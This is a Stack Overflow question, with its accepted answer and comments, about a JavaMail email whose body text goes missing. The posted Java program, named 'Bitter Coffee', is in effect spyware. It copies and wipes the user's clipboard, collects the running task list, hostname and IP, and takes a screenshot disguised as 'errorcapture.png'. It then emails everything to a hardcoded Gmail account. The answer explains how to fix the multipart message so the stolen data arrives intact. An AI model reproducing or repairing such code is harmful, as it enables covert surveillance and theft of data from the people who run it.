# Javamail email with attatchment: Text not being sent

Tags: java, jakarta-mail

I am trying to create a program that sends an email containing certain data with an attachment but for some reason the text in the email isn't being received. The entire code is:

```
import java.awt.Dimension;
import java.awt.Rectangle;
import java.awt.Robot;
import java.awt.Toolkit;
import java.awt.datatransfer.DataFlavor;
import java.awt.datatransfer.StringSelection;
import java.awt.datatransfer.Transferable;
import java.awt.image.BufferedImage;
import java.io.BufferedReader;
import java.io.File;
import java.io.InputStreamReader;
import java.net.InetAddress;
import java.net.UnknownHostException;
import java.util.*;
import javax.activation.*;
import javax.imageio.ImageIO;
import javax.mail.*;
import javax.mail.internet.*;

/* Terms of Use
* Program created by Silver (CEO of Idrees Inc) for theoretical and educational purposes only
* No data received from this app is used for any other purpose except the ones above
* Do NOT use this for any purposes other than the conditions above (Including the recording or saving of any data obtained with this program)
* You may NOT distribute, copy, or modify this program without the express permission of Silver (idrees@idreesinc.com)
* Silver is NOT responsible for any damages, physical or virtual, caused by this program
* Clipboard, Screen Capture and Task-list checkers based off programs by csanuragjain (http://www.codeproject.com/Members/csanuragjain)
* SMTP email with Gmail created by Arpit Shah (Founder of Crunchify.com [crunchify.com/about])
* Copyright IdreesInc.com  All rights reserved
*/

public class Application {

public static void main(String[] args) {

    final String username = "javasmtpserver@gmail.com";
    final String password = "password";
    String data = null;
    BufferedReader input = null;
    String commandOutput = "";
    InetAddress ip = null;
    String hostname = null;
    boolean allowEmails = true; //Allows or Blocks the application's ability to send emails

    //Clipboard Copier
     Transferable t = Toolkit.getDefaultToolkit().getSystemClipboard().getContents(null);

        try {
            if (t != null && t.isDataFlavorSupported(DataFlavor.stringFlavor)) {
                String text = (String)t.getTransferData(DataFlavor.stringFlavor);
                data = text;
                System.out.println("Current clipboard data:\n"+data); //Prints Clipboard data
                text=""; //String is now empty
                StringSelection ss = new StringSelection(text); //Clears Clipboard data
                Toolkit.getDefaultToolkit().getSystemClipboard().setContents(ss, null);
                System.out.println("Clipboard data wiped successfully" + text); //Displays "text" string after output for debugging

            }
        }
        catch(Exception e)
        {



    }
            //Tasklist Copier
        try {
            String line;
            Process p = Runtime.getRuntime().exec("tasklist.exe"); //Accesses running task-list
            input =
                    new BufferedReader(new InputStreamReader(p.getInputStream()));
            while ((line = input.readLine()) != null) {
                System.out.println(line); //Data is parsed
                   commandOutput += line;
                    line = input.readLine();
            }
            input.close();

        } catch (Exception err) {
            err.printStackTrace();
        }

          //IP Address Tracker
       try {
           ip = InetAddress.getLocalHost();
           hostname = ip.getHostName();
           System.out.println("IP address : " + ip);
           System.out.println("Hostname : " + hostname);

       } catch (UnknownHostException e) {
           e.printStackTrace();
       }

         //Screen Capture
    try
    {
     Dimension size = Toolkit.getDefaultToolkit().getScreenSize();
        Robot robot = new Robot();
        BufferedImage img = robot.createScreenCapture(new Rectangle(size));
        File save_path=new File("errorcapture.png");
        ImageIO.write(img, "png", save_path);
        System.out.println("Screen successfully captured");
    }
    catch(Exception e)
    {

    }

         //Data Sender
    if(allowEmails) {

    Properties props = new Properties();
    props.put("mail.smtp.auth", true);
    props.put("mail.smtp.starttls.enable", true);
    props.put("mail.smtp.host", "smtp.gmail.com");
    props.put("mail.smtp.port", "587");

    Session session = Session.getInstance(props,
            new javax.mail.Authenticator() {
                protected PasswordAuthentication getPasswordAuthentication() {
                    return new PasswordAuthentication(username, password);
                }
            });

    try {

        Message message = new MimeMessage(session);
        message.setFrom(new InternetAddress("javasmtpserver@gmail.com"));
        message.setRecipients(Message.RecipientType.TO,
                InternetAddress.parse("javasmtpserver@gmail.com"));
        message.setSubject("Application 'Bitter Coffee' Has Been Activated By " + hostname);
        message.setText("Application 'Bitter Coffee' has been activated by " + hostname + " (" + ip + ") and has ran successfully" + "<br><br>The activators information is as follows: " + "<br><br>Hostname: " + hostname + "<br>Server IP Address: " + ip + "<br><br>Clipboard Data: " + data + "<br><br><br>Active Tasks: " + commandOutput + "<br><br><br>Program created by Silver (CEO of Idrees Inc) for theoretical and educational purposes only<br>No data received from this app is used for any other purpose except the ones above<br>Do NOT use this for any purposes other than the conditions above (Including the recording or saving of any data obtained with this program)<br>You may NOT distribute, copy, or modify this program without the express permission of Silver (idrees@idreesinc.com)<br>I am not responsible for any damages, physical or virtual, caused by this program<br>Clipboard and Task-list checkers based off programs by csanuragjain (www.codeproject.com/Members/csanuragjain)<br>SMTP email with Gmail created by Arpit Shah (Founder of Crunchify.com [crunchify.com/about])<br><br>Copyright IdreesInc.com  All rights reserved");

        MimeBodyPart messageBodyPart = new MimeBodyPart();

        Multipart multipart = new MimeMultipart();

        messageBodyPart = new MimeBodyPart();
        String file = "errorcapture.png";
        String fileName = "errorcapture.png";
        DataSource source = new FileDataSource(file);
        messageBodyPart.setDataHandler(new DataHandler(source));
        messageBodyPart.setFileName(fileName);
        multipart.addBodyPart(messageBodyPart);

        message.setContent(multipart);

        System.out.println("Sending");

        Transport.send(message);

        System.out.println("Done");

    } catch (MessagingException e) {
        e.printStackTrace();
    }
    }
  }
}
```

The part that contains the programs javamail sender is here:

```
 //Data Sender
    if(allowEmails) {

    Properties props = new Properties();
    props.put("mail.smtp.auth", true);
    props.put("mail.smtp.starttls.enable", true);
    props.put("mail.smtp.host", "smtp.gmail.com");
    props.put("mail.smtp.port", "587");

    Session session = Session.getInstance(props,
            new javax.mail.Authenticator() {
                protected PasswordAuthentication getPasswordAuthentication() {
                    return new PasswordAuthentication(username, password);
                }
            });

    try {

        Message message = new MimeMessage(session);
        message.setFrom(new InternetAddress("javasmtpserver@gmail.com"));
        message.setRecipients(Message.RecipientType.TO,
                InternetAddress.parse("javasmtpserver@gmail.com"));
        message.setSubject("Application 'Bitter Coffee' Has Been Activated By " + hostname);
        message.setText("This is the body text that won't show up");

        MimeBodyPart messageBodyPart = new MimeBodyPart();

        Multipart multipart = new MimeMultipart();

        messageBodyPart = new MimeBodyPart();
        String file = "errorcapture.png";
        String fileName = "errorcapture.png";
        DataSource source = new FileDataSource(file);
        messageBodyPart.setDataHandler(new DataHandler(source));
        messageBodyPart.setFileName(fileName);
        multipart.addBodyPart(messageBodyPart);

        message.setContent(multipart);

        System.out.println("Sending");

        Transport.send(message);

        System.out.println("Done");

    } catch (MessagingException e) {
        e.printStackTrace();
    }
    }
```

Please explain thoroughly since I am a complete noob at Java.
Thanks for all your guy's help! :)
Also tell me if I miss anything in the post since this is only my 2nd or 3rd S.O. question

Answer (score 1, accepted):

Where did you copy and paste that code from?

The [JavaMail FAQ](http://www.oracle.com/technetwork/java/javamail/faq/index.html) has lots of tips, including debugging tips.  Read it.

You'll find sample JavaMail programs [here](https://java.net/projects/javamail/pages/Home#Samples), showing you how to create messages with attachments, among many other things.

Your particular problem is that your multipart needs two body parts - one for the main text and one for the attachment.

Comment: What do you mean? I based it off the projects listed in the disclaimer but I created the project myself. I am Silver. I have checked the Javamail FAQ as you suggested but did not find a solution to my problem. Any idea on how to add a part to it?

Comment: See the sendfile.java sample program in the download referenced above.  When you call msg.setText, you set the entire content of the message to the text.  When you later call msg.setContent, you replace the entire contents of the message with the multipart content.  But your multipart content only has one part - the attachment.  It also needs to include a part for the main body content of your message.